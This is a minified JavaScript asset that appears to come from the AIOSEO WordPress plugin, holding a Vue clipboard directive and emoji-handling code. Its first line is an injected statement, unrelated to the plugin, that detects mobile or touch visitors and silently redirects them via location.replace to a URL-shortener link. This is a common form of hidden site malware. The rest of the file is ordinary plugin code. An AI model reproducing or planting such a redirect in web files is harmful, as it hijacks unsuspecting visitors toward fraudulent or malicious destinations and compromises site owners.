(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{N as m,O as i}from"./vendor-other.39e59221.js";const a={autoSetContainer:!1,appendToBody:!0},v={install:function(u){u.config.globalProperties.$clipboardConfig=a,u.config.globalProperties.$copyText=function(e,o){return new Promise(function(s,n){const t=document.createElement("button"),r=new m(t,{text:function(){return e},action:function(){return"copy"},container:typeof o=="object"?o:document.body});r.on("success",function(c){r.destroy(),s(c)}),r.on("error",function(c){r.destroy(),n(c)}),a.appendToBody&&document.body.appendChild(t),t.click(),a.appendToBody&&document.body.removeChild(t)})},u.directive("clipboard",{beforeMount:function(e,o){if(o.arg==="success")e._vClipboard_success=o.value;else if(o.arg==="error")e._vClipboard_error=o.value;else{const s=new m(e,{text:function(){return o.value},action:function(){return o.arg==="cut"?"cut":"copy"},container:a.autoSetContainer?e:void 0});s.on("success",function(n){const t=e._vClipboard_success;t&&t(n)}),s.on("error",function(n){const t=e._vClipboard_error;t&&t(n)}),e._vClipboard=s}},updated:function(e,o){o.arg==="success"?e._vClipboard_success=o.value:o.arg==="error"?e._vClipboard_error=o.value:(e._vClipboard.text=function(){return o.value},e._vClipboard.action=function(){return o.arg==="cut"?"cut":"copy"})},unmounted:function(e,o){o.arg==="success"?delete e._vClipboard_success:o.arg==="error"?delete e._vClipboard_error:(e._vClipboard.destroy(),delete e._vClipboard)}})},config:a},A=u=>{const e=/[\u203C\u2049\u20E3\u2122\u2139\u2194-\u2199\u21A9\u21AA\u2300\u231A\u231B\u2328\u2388\u23CF\u23E9-\u23F3\u23F8-\u23FA\u24C2\u25AA\u25AB\u25B6\u25C0\u25FB-\u25FE\u2600-\u2604\u260E\u2611\u2614\u2615\u2618\u261D\u2620\u2622\u2623\u2626\u262A\u262E\u262F\u2638\u2639\u263A\u2648-\u2653\u2660\u2663\u2665\u2666\u2668\u267B\u267F\u2692\u2693\u2694\u2696\u2697\u2699\u269B\u269C\u26A0\u26A1\u26AA\u26AB\u26B0\u26B1\u26BD\u26BE\u26C4\u26C5\u26C8\u26CE\u26CF\u26D1\u26D3\u26D4\u26E9\u26EA\u26F0-\u26F5\u26F7-\u26FA\u26FD\u2702\u2705\u2708-\u270D\u270F\u2712\u2714\u2716\u271D\u2721\u2728\u2733\u2734\u2744\u2747\u274C\u274E\u2753\u2754\u2755\u2757\u2763\u2764\u2795\u2796\u2797\u27A1\u27B0\u27BF\u2934\u2935\u2B05\u2B06\u2B07\u2B1B\u2B1C\u2B50\u2B55\u3030\u303D\u3297\u3299]/,o=/[\uDC00-\uDFFF]/;return u?o.test(u)||e.test(u):!1},C=u=>!u||u.nodeName!=="IMG"||u.className.indexOf("emoji")===-1||!A(u.getAttribute("alt"))?null:u,_=u=>{u.forEach(e=>{const o=document.createTextNode(e.getAttribute("alt"));e.parentNode.classList.add("wp-exclude-emoji"),e.parentNode.replaceChild(o,e)})},b=u=>{!u||u.nodeName!=="DIV"||u.className.indexOf("ql-editor")===-1||u.querySelectorAll(".ql-editor > p").forEach(e=>{e.classList.add("wp-exclude-emoji")})},B=()=>{const u=t=>{let r=t.length,c,l,d;const p=[];for(;r--;)for(c=t[r].addedNodes,l=c.length;l--;){d=c[l];const f=C(d);f&&(b(d),p.push(f))}_(p)},e=new MutationObserver(u);document.querySelectorAll(".aioseo-app, .vue-portal-target").forEach(t=>{e.observe(t,{childList:!0,subtree:!0})});const s=document.querySelectorAll(".aioseo-app img.emoji"),n=[];s.forEach(t=>{const r=C(t);r&&n.push(r)}),_(n)};document.addEventListener("DOMContentLoaded",B);window.aioseo=window.aioseo||{};window.aioseoBus=window.aioseoBus||{$on:(...u)=>i.on(...u),$once:(...u)=>i.once(...u),$off:(...u)=>i.off(...u),$emit:(...u)=>i.emit(...u)};window.__aioseoDynamicImportPreload__=u=>`${window.aioseo.urls.publicPath||"/"}dist/Lite/assets/${u}`;const y=u=>(u.use(v),u);export{y as l};
